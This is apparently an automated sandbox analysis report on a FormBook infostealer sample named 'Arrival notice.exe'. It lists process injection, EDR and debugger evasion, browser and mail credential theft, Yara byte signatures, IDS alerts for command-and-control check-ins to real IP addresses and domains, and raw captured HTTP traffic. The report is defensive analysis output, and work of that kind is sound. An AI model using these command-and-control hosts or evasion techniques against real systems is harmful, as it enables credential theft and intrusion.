Windows Analysis Report
Arrival notice.exe

Overview

General Information

Sample name:Arrival notice.exe
Analysis ID:1527837
MD5:50397bfab2624cccb8c7ae8ce667048c
SHA1:719db4c99ee56ff658a1b477e589dffbc37fa582
SHA256:ebd5341fb10c3fd26e72d2664961d062bdd4982fe95c327a32aeb4784742e9d8
Tags:exe, user-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Arrival notice.exe (PID: 5980 cmdline: "C:\Users\user\Desktop\Arrival notice.exe" MD5: 50397BFAB2624CCCB8C7AE8CE667048C)
    • svchost.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\Arrival notice.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • JGgOTaRBeKg.exe (PID: 6332 cmdline: "C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • mobsync.exe (PID: 7812 cmdline: "C:\Windows\SysWOW64\mobsync.exe" MD5: F7114D05B442F103BD2D3E20E78A7AA5)
          • firefox.exe (PID: 8112 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000C.00000002.3747714326.0000000002D10000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000C.00000002.3747714326.0000000002D10000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2c110:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1435f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000B.00000002.3758373668.0000000009130000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000B.00000002.3758373668.0000000009130000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x5b00c:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x4325b:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        SourceRuleDescriptionAuthorStrings
        9.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          9.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2f5a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x177f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          9.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            9.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e7a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x169f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Arrival notice.exe", CommandLine: "C:\Users\user\Desktop\Arrival notice.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Arrival notice.exe", ParentImage: C:\Users\user\Desktop\Arrival notice.exe, ParentProcessId: 5980, ParentProcessName: Arrival notice.exe, ProcessCommandLine: "C:\Users\user\Desktop\Arrival notice.exe", ProcessId: 7524, ProcessName: svchost.exe
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Arrival notice.exe", CommandLine: "C:\Users\user\Desktop\Arrival notice.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Arrival notice.exe", ParentImage: C:\Users\user\Desktop\Arrival notice.exe, ParentProcessId: 5980, ParentProcessName: Arrival notice.exe, ProcessCommandLine: "C:\Users\user\Desktop\Arrival notice.exe", ProcessId: 7524, ProcessName: svchost.exe

            AV Detection

            Source: chalet-tofane.netVirustotal: Detection: 8%Perma Link
            Source: platinumkitchens.infoVirustotal: Detection: 9%Perma Link
            Source: http://www.chalet-tofane.net/vv4m/Virustotal: Detection: 7%Perma Link
            Source: http://www.platinumkitchens.info/nkwh/Virustotal: Detection: 6%Perma Link
            Source: Arrival notice.exeReversingLabs: Detection: 55%
            Source: Arrival notice.exeVirustotal: Detection: 45%Perma Link
            Source: Yara matchFile source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.3747714326.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3758373668.0000000009130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1730283884.0000000008C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3746700176.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1725426506.0000000004390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3750353258.0000000003960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
            Source: Arrival notice.exeJoe Sandbox ML: detected
            Source: Arrival notice.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: mobsync.pdbGCTL source: svchost.exe, 00000009.00000003.1689351235.0000000003031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1689337789.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1689193431.000000000301B000.00000004.00000020.00020000.00000000.sdmp, JGgOTaRBeKg.exe, 0000000B.00000003.1798946272.000000000124F000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: JGgOTaRBeKg.exe, 0000000B.00000000.1640439845.0000000000AEE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Arrival notice.exe, 00000002.00000003.1338414590.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, Arrival notice.exe, 00000002.00000003.1337835940.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, Arrival notice.exe, 00000002.00000003.1338176959.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1620535046.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1725087316.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1622258941.0000000003400000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000003.1725316747.0000000004683000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000003.1727564650.000000000483F000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Arrival notice.exe, 00000002.00000003.1338414590.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, Arrival notice.exe, 00000002.00000003.1337835940.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, Arrival notice.exe, 00000002.00000003.1338176959.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1620535046.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1725087316.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1622258941.0000000003400000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, mobsync.exe, 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000003.1725316747.0000000004683000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000003.1727564650.000000000483F000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: mobsync.pdb source: svchost.exe, 00000009.00000003.1689351235.0000000003031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1689337789.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1689193431.000000000301B000.00000004.00000020.00020000.00000000.sdmp, JGgOTaRBeKg.exe, 0000000B.00000003.1798946272.000000000124F000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.0000000006CFC000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3748827254.0000000002DF8000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000501C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2024715906.000000003F7BC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.0000000006CFC000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3748827254.0000000002DF8000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000501C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2024715906.000000003F7BC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_007FC690 FindFirstFileW,FindNextFileW,FindClose,12_2_007FC690
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeCode function: 4x nop then xor eax, eax11_2_09168AAC
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeCode function: 4x nop then pop edi11_2_091655C5
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeCode function: 4x nop then mov esp, ebp11_2_09162FAC
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 4x nop then xor eax, eax12_2_007E9BB0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 4x nop then mov ebx, 00000004h12_2_048304E9

            Networking

            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49980 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49994 -> 45.130.41.13:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49985 -> 46.17.172.49:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49999 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49977 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50008 -> 38.47.233.65:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49992 -> 62.149.128.40:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50012 -> 172.81.61.224:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49984 -> 162.0.238.246:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50013 -> 194.58.112.174:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50001 -> 203.175.9.128:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49998 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49986 -> 46.17.172.49:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50017 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49991 -> 62.149.128.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50002 -> 203.175.9.128:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49990 -> 62.149.128.40:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49988 -> 46.17.172.49:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49995 -> 45.130.41.13:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49997 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50004 -> 203.175.9.128:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50006 -> 38.47.233.65:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49979 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49976 -> 76.223.105.230:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50003 -> 203.175.9.128:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49981 -> 162.0.238.246:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49996 -> 45.130.41.13:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50005 -> 38.47.233.65:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49993 -> 45.130.41.13:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49978 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49987 -> 46.17.172.49:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49989 -> 62.149.128.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50011 -> 172.81.61.224:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50009 -> 172.81.61.224:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50010 -> 172.81.61.224:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50015 -> 194.58.112.174:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50000 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50016 -> 194.58.112.174:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49983 -> 162.0.238.246:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49982 -> 162.0.238.246:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50014 -> 194.58.112.174:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50007 -> 38.47.233.65:80
            Source: DNS query: www.030002304.xyz
            Source: DNS query: www.kilbmn.xyz
            Source: DNS query: www.animekuid.xyz
            Source: DNS query: www.moritynomxd.xyz
            Source: Joe Sandbox ViewIP Address: 162.0.238.246 162.0.238.246
            Source: Joe Sandbox ViewIP Address: 62.149.128.40 62.149.128.40
            Source: Joe Sandbox ViewIP Address: 38.47.233.65 38.47.233.65
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
            Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
            Source: Joe Sandbox ViewASN Name: CP-ASDE CP-ASDE
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownHTTP traffic detected: POST /u38h/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Content-Type: application/x-www-form-urlencodedContent-Length: 194Cache-Control: no-cacheConnection: closeHost: www.030002304.xyzOrigin: http://www.030002304.xyzReferer: http://www.030002304.xyz/u38h/User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53Data Raw: 45 5a 32 6c 6f 3d 76 59 5a 6b 74 33 6a 65 70 4d 38 4b 70 47 61 63 77 78 76 50 6c 4d 6b 2f 53 37 6e 73 66 41 4d 52 6b 6b 38 55 33 54 76 50 76 6b 2b 6e 33 78 47 50 6a 4d 6d 48 31 47 32 4a 6d 33 2b 45 53 54 66 54 55 68 64 66 36 5a 41 79 73 2b 6d 6a 53 6a 41 35 32 69 57 4b 46 4e 2f 4d 44 42 4e 5a 5a 72 6c 54 64 33 73 75 6f 63 31 58 6f 66 59 5a 63 5a 7a 77 33 48 72 53 73 6e 72 70 31 33 2f 61 67 71 58 41 63 77 51 52 54 56 71 63 57 44 6a 45 67 52 75 6a 44 55 75 37 71 35 4d 6c 48 33 7a 42 48 59 43 55 48 56 6f 74 75 58 48 53 65 69 66 50 74 6b 4d 76 61 44 56 53 30 43 2f 4d 74 58 6e 30 Data Ascii: EZ2lo=vYZkt3jepM8KpGacwxvPlMk/S7nsfAMRkk8U3TvPvk+n3xGPjMmH1G2Jm3+ESTfTUhdf6ZAys+mjSjA52iWKFN/MDBNZZrlTd3suoc1XofYZcZzw3HrSsnrp13/agqXAcwQRTVqcWDjEgRujDUu7q5MlH3zBHYCUHVotuXHSeifPtkMvaDVS0C/MtXn0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 07 Oct 2024 08:38:40 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 07 Oct 2024 08:38:42 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 